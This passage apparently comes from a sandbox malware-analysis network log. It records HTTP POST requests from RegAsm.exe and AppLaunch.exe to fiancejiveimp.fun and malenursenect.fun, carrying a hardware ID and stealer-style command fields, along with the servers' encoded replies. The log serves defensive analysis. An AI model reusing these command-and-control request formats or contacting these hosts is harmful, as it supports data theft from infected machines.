                                                                    Oct 3, 2023 09:55:17.246965885 CEST6178OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 00 6b 2c 90 f4 76 0b 75 5a 2c e1 86
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA ,[k,vuZ,[7O~bnPk
                                                                    Oct 3, 2023 09:55:18.286426067 CEST6196INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:55:17 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    23192.168.2.349852104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:17.875031948 CEST6188OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:17.875524044 CEST6189OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:18.790712118 CEST6202INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=14l0a7gq0deis2p6okh6bjfbrj; expires=Sat, 27 Jan 2024 01:41:57 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:18 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ttdIvaeIzU9aGncfq3Z30tBqXRLiGlv2Cc14USGg4m3CKkjd3jQoXjkdpijxSfWtApjQuSf%2B4XVJ34QjFBYUs%2B8jAgNPLtCdjXcs23mKo5Ook7V3EpNbkcPbY0sav%2BOIR8Q8lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f3cfd268266-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:18.790791035 CEST6202INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    24192.168.2.349855104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:18.464087009 CEST6199OUTPOST /api HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: malenursenect.fun
                                                                    Content-Length: 61
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 50 72 54 69 4f 37 2d 2d 49 6e 73 74 61 6c 6c 42 65 73 74 32 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30
                                                                    Data Ascii: act=recive_message&lid=PrTiO7--InstallBest2&j=default&ver=4.0
                                                                    Oct 3, 2023 09:55:19.335035086 CEST6212INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=qf2ed813od2qsss0ovr6jcoorm; expires=Sat, 27 Jan 2024 01:41:57 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:18 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gAqNlJdlIbcdCWoD5bFjM9N7zc3vOk90FLtcRr8e9lp56jKkFsP617fW1wQLIvcHH5Nz%2B3El1PWItwdJTYuv%2Bpil%2BuACLmo5prBFxHL5xTVlXvJDZ2VmTKMXNtG1boAfe67Hcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f40981439b5-IAD
                                                                    Data Raw: 34 30 32 0d 0a 4a 2b 4e 68 56 77 74 4f 56 4d 2b 4a 70 31 4c 56 79 45 31 74 77 78 4c 59 55 35 51 78 7a 54 4a 53 6c 51 66 42 4d 57 53 64 4c 68 70 63 37 6d 74 33 4b 32 35 30 37 66 2b 46 61 50 58 38 59 57 44 4a 4d 76 68 7a 74 42 4f 2b 56 33 43 76 4a 37 56 44 45 66 67 43 46 79 33 44 51 58 63 72 62 44 57 72 71 35 31 79 73 36 6b 68 48 71 59 2b 31 56 6d 30 45 65 30 53 63 50 42 2f 34 77 74 45 78 69 4d 51 42 38 4e 42 64 79 74 75 4c 38 4b 44 68 33 4c 31 36 47 31 4e 34 7a 4c 36 4e 76 6f 54 39 78 4a 77 38 47
                                                                    Data Ascii: 402J+NhVwtOVM+Jp1LVyE1twxLYU5QxzTJSlQfBMWSdLhpc7mt3K2507f+FaPX8YWDJMvhztBO+V3CvJ7VDEfgCFy3DQXcrbDWrq51ys6khHqY+1Vm0Ee0ScPB/4wtExiMQB8NBdytuL8KDh3L16G1N4zL6NvoT9xJw8G
                                                                    Oct 3, 2023 09:55:19.335084915 CEST6213INData Raw: 32 6a 55 41 6a 2f 54 33 46 49 6b 77 30 30 59 79 49 7a 70 2b 7a 45 4e 72 53 6b 49 41 69 6d 64 37 6b 35 2b 6c 69 67 57 6a 2b 33 4b 38 77 37 52 4c 30 4f 4f 67 66 44 51 58 63 70 4b 79 37 74 73 34 64 77 6d 4b 30 35 44 49 35 7a 71 7a 69 32 50 4d 63 53
                                                                    Data Ascii: 2jUAj/T3FIkw00YyIzp+zENrSkIAimd7k5+ligWj+3K8w7RL0OOgfDQXcpKy7ts4dwmK05DI5zqzi2PMcScrUn4REZsSMQB8NBdytuL8KDh3L16G1N4zL6NvoT9xJw+2yjWAz7TH9IhAAyaiExp+XCNLujIgmhd7405FamXDy3K8w7RL0OOgfDQXcpKy7ts4dwmK05DI5zqzi2PMcScrUn4REZsSMQB8NBdytuL8KDh3L16G1N4
                                                                    Oct 3, 2023 09:55:19.335095882 CEST6214INData Raw: 33 63 36 65 0d 0a 45 4f 50 69 6c 44 58 75 2b 70 68 33 4c 31 36 44 42 42 7a 68 6a 34 63 37 51 52 37 52 49 70 6d 41 33 68 45 55 53 39 44 6a 6f 48 77 30 4d 79 5a 57 78 75 37 36 76 4e 4d 4c 47 70 49 67 36 74 64 37 45 36 2f 56 2b 67 57 44 44 2f 61 36
                                                                    Data Ascii: 3c6eEOPilDXu+ph3L16DBBzhj4c7QR7RIpmA3hEUS9DjoHw0MyZWxu76vNMLGpIg6td7E6/V+gWDD/a6ZQCPVNf0uEAzJhIzqm7YV+2MJtTeMy+HO0Ee9XKLc94RMq9EhuXsFsXStudO+phy/5xUdN4zL4c7RKwDhytSfhEUS9DjhCjUNtK2w1qevEML+4Lx2lc7w//1ylXzH5b6pUAfJKd0aOAjFnLXbjhK1y9ehtTeMy+HH
                                                                    Oct 3, 2023 09:55:19.335242987 CEST6215INData Raw: 4e 42 64 79 73 31 57 63 57 70 68 33 4c 31 36 47 31 4e 34 7a 43 39 50 62 59 4c 37 52 41 38 2b 57 57 73 58 77 72 30 52 48 6c 4a 6a 77 51 77 59 43 51 2b 76 2b 72 42 4f 4c 61 6b 49 41 36 6c 64 62 38 31 38 56 65 70 58 33 43 35 43 73 73 52 52 4c 30 4f
                                                                    Data Ascii: NBdys1WcWph3L16G1N4zC9PbYL7RA8+WWsXwr0RHlJjwQwYCQ+v+rBOLakIA6ldb818VepX3C5CssRRL0OOgfDQXVuNHb1qYUfkJ9tLpsw1Vm0Ee0ScrV67TxuvQ46B8NBLAZEdO+ph3L16G1Ppnz6abQTo1M8/2qlWgr1RXNJigc5YCkwrO7AMbOmJQmic7U++VvvHl+fJ+ERRL0OOgfBBC0pdHTtztI7uaxvYMky+HO0Ee1Pf
                                                                    Oct 3, 2023 09:55:19.335304976 CEST6216INData Raw: 4f 61 72 69 77 6a 43 78 75 43 67 43 71 48 43 78 4f 50 78 58 72 6c 74 77 75 51 72 4c 45 55 53 39 44 6a 6f 48 77 30 46 31 62 6a 52 32 39 61 6d 46 41 72 43 38 50 77 7a 68 48 39 4a 7a 74 42 48 74 45 6e 4c 6f 4b 38 67 38 62 70 51 4f 4f 6c 7a 75 61 33
                                                                    Data Ascii: OariwjCxuCgCqHCxOPxXrltwuQrLEUS9DjoHw0F1bjR29amFArC8PwzhH9JztBHtEnLoK8g8bpQOOlzua3crbnTvqYdy960jT/ky+jzkUqpCNPhusVgA/0lqQo0JOmokO67j1zC6qj0dp3u0cbg8xxJytSfhEUS9DH9dwVt3KR0hpquqWPXobU3jMqV/nTzHO3K1fMw7RL0OOgfDQXcpKzrts4dwtKAiAbN0vDr1XadVOPNvrlw
                                                                    Oct 3, 2023 09:55:19.335365057 CEST6218INData Raw: 4b 79 75 44 31 50 37 78 2f 53 63 37 51 52 37 52 4a 79 74 53 66 6a 56 42 36 2f 46 44 6f 46 74 77 51 6c 65 53 39 30 6e 50 33 47 4a 72 79 6e 49 30 2f 4f 47 50 68 7a 74 42 48 74 45 69 2b 35 43 73 73 52 52 4c 30 4f 4f 67 65 59 62 46 30 72 62 6e 54 76
                                                                    Data Ascii: KyuD1P7x/Sc7QR7RJytSfjVB6/FDoFtwQleS90nP3GJrynI0/OGPhztBHtEi+5CssRRL0OOgeYbF0rbnTvqYdy9eooA+Eo+HHwXKZTP/Zsr14D9kl5Q4UJP2kqMKzuzzO2oCYIqXe5I7YdwDhytSfhEUS9DjhCmUNtK2wfqvnLIPfFR03jMvhztEzhP1i1J+ERRL1VFy3DQXcrbnTvqYU3u+p3TeF0sD7yVKNWNfFoolwH/0N8T
                                                                    Oct 3, 2023 09:55:19.335426092 CEST6219INData Raw: 67 6d 4b 6f 41 2f 68 51 74 42 42 66 6e 79 66 68 45 55 53 39 44 6d 63 4c 37 6d 74 33 4b 32 35 30 37 36 6e 63 58 39 2f 6f 62 55 33 6a 4d 76 68 7a 74 42 4f 6f 58 48 43 76 4a 2b 4e 59 44 76 42 65 66 55 79 4a 42 7a 78 70 4b 44 79 67 37 4d 55 31 75 71
                                                                    Data Ascii: gmKoA/hQtBBfnyfhEUS9DmcL7mt3K25076ncX9/obU3jMvhztBOoXHCvJ+NYDvBefUyJBzxpKDyg7MU1uq8rAaV3uj35VKdfNPdq4x1plw46B8NBdytudqrzhWj16g8Et1G0OuQTwDhytSfhEUTgAhctw0F3K250tIStcvXobU3jMvhx8V/vCHK3a6pSDvFAcEGTAz5gIzei68YxvaI9CaF7sjb+V6FCMfgl7TxuvQ46B8NBdyt
                                                                    Oct 3, 2023 09:55:19.335474968 CEST6221INData Raw: 51 54 71 45 68 77 72 79 66 6a 66 67 72 34 5a 58 39 65 77 57 78 64 4b 32 35 30 37 36 6d 48 4c 2f 6e 46 52 30 33 6a 4d 76 68 7a 74 45 72 41 4f 48 4b 31 4a 2b 45 52 52 4c 30 4f 4f 45 4b 4e 51 32 30 72 62 44 65 6d 34 63 6f 39 74 4b 77 73 42 4b 52 36
                                                                    Data Ascii: QTqEhwryfjfgr4ZX9ewWxdK25076mHL/nFR03jMvhztErAOHK1J+ERRL0OOEKNQ20rbDem4co9tKwsBKR6uzb+Xr1TP/hho1wA+U13Q4YKNGErduOErXL16G1N4zL4cfFL7whyt0ukUAK/IxAHw0F3K24p44StcvXobU3jadVZtBHtEnK1J+ETAfMMIAfBBjZuKjml7cE/uKklBaF4vTX3U6pTPflvqVAK8U91S4FDewZEdO+ph
                                                                    Oct 3, 2023 09:55:19.335551023 CEST6222INData Raw: 70 53 76 4d 4f 30 53 39 44 6a 6f 48 77 30 46 33 4b 54 35 32 39 61 6d 46 64 37 53 34 50 51 6d 69 5a 72 6c 32 79 47 32 49 52 6a 72 77 64 61 52 45 43 62 38 43 46 79 33 44 51 58 63 72 62 6e 54 76 71 59 55 2f 39 2f 4a 74 4e 73 34 59 2b 48 4f 30 45 65
                                                                    Data Ascii: pSvMO0S9DjoHw0F3KT529amFd7S4PQmiZrl2yG2IRjrwdaRECb8CFy3DQXcrbnTvqYU/9/JtNs4Y+HO0Ee0ScrUn4RFEv0V/XpAVOHkrdsKDh3L16G1N4zKFf5k77RJytSfhEUS/VDgdw0MAaiI4qv3UfZC8JQixd60+th3AOHK1J+ERRL0OOEPBW3c6YlnFqYdy9ehtTeMwviC2C+0AYqww8ARWrSMQB8NBdytuKeOErXL16G1
                                                                    Oct 3, 2023 09:55:19.335592031 CEST6223INData Raw: 48 70 52 6d 4d 48 70 77 51 6b 59 44 6f 37 76 39 58 37 48 72 71 72 4c 41 48 6a 51 61 77 38 35 6c 43 71 56 77 37 4a 61 36 52 48 41 66 46 4b 65 41 58 50 62 46 30 72 62 6e 54 76 71 59 64 79 39 65 6f 67 54 2f 6b 79 67 33 47 2b 45 35 41 65 58 35 38 6e
                                                                    Data Ascii: HpRmMHpwQkYDo7v9X7HrqrLAHjQaw85lCqVw7Ja6RHAfFKeAXPbF0rbnTvqYdy9eogT/kyg3G+E5AeX58n4RFEvQ46B8EbdTFudpjoyz6wvD5CgmesO+0RiVch/nOuQUaxIxAHw0F3K25076vDcO/of0HOGPhztBHtEnK1JadCRqcOKBfaVmY+fGTCg4dy9ehtTb4+1Vm0Ee0ScrV8zDtEvQ46B8NBdyk6dvWpl37Ywm1N4zL4c
                                                                    Oct 3, 2023 09:55:19.335674047 CEST6225INData Raw: 32 55 46 31 4c 69 49 37 72 4f 6a 4c 4d 36 57 34 4b 51 79 33 63 2f 30 50 79 48 61 69 58 54 58 35 59 70 31 74 4a 2f 56 63 64 55 71 47 50 51 74 65 50 54 47 39 71 65 4d 7a 6f 61 6c 76 51 63 34 59 2b 48 4f 30 45 65 30 53 63 72 55 6c 75 78 4e 65 76 51
                                                                    Data Ascii: 2UF1LiI7rOjLM6W4KQy3c/0PyHaiXTX5Yp1tJ/VcdUqGPQtePTG9qeMzoalvQc4Y+HO0Ee0ScrUluxNevQxZT5EOOm5sWcWph3L16G0Q7x/Sc7QR7RJy7grLEUS9DjoHw0F1f2xu77mLX9/obU3jMvhztBO9EGi1JeRQFO1Ke1OCRAtXDzq2zcIhvuphYMky+HO0Ee0Scrdq4wtExgwwCYAOOW1sCeOErXL16G1N4zL4ce4T9xJ


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    25192.168.2.349857172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:19.006995916 CEST6204OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:19.007320881 CEST6205OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:19.559545994 CEST6236INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=33e0an5vid3jst4ka1a18sqb3b; expires=Sat, 27 Jan 2024 01:41:58 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:19 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9i5Wf4MkcGfu2G%2F%2B8JTjSAJUPwPzmpqypzFfk2%2Bwi8E9tNU7YvR%2FFHDR2RboytR3DQ2%2BjtpXKFzGXlNRwmZLfA1j7EboRBVkSA9HlC%2BbCBU8TKL6IiGTiPO%2F9ZszzFU%2BvJci9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f440bdd8012-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:19.559566975 CEST6236INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    26192.168.2.349859104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:19.654803991 CEST6237OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:19.655217886 CEST6237OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:19.984169006 CEST6252INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=nlvmfj764uljfsu5kjqq7ko6kj; expires=Sat, 27 Jan 2024 01:41:58 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:19 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JjaZm7JgajR%2B8hPIXc312q%2Fd92d5RPfPZN%2BEPvv%2B%2FHMhEXeE0dWSTnqx7glxpxOHInkV3vxaWv3bnuakCfubVLSV09cnqJJ6Z36E%2FvWpkT89NNxdJcS1WlcRbZ%2BSq%2BVVULc2Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f481ad93952-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:19.984195948 CEST6252INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    27192.168.2.349860172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:19.979816914 CEST6250OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:19.980041981 CEST6250OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:20.232137918 CEST6255INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=c9u5rn77iogdf94jvje3tcmsgv; expires=Sat, 27 Jan 2024 01:41:59 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:20 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cSi%2FQ9JAaOxdfohz5yxE1vjq6IYRjKDaD%2FMVan7Jp0BsBiFiQlaEuGYBgAZnySVipWmbAveXTXA0iwWnwE5EEnuOJ%2FHQADulNMu4qKrCaeIjbIl%2B0lZH57YKDAigg2vR8KWxYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f4a1ffc5794-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:20.232225895 CEST6255INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    28192.168.2.349861104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:20.222357035 CEST6253OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:20.222754002 CEST6254OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:20.598479986 CEST6261INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
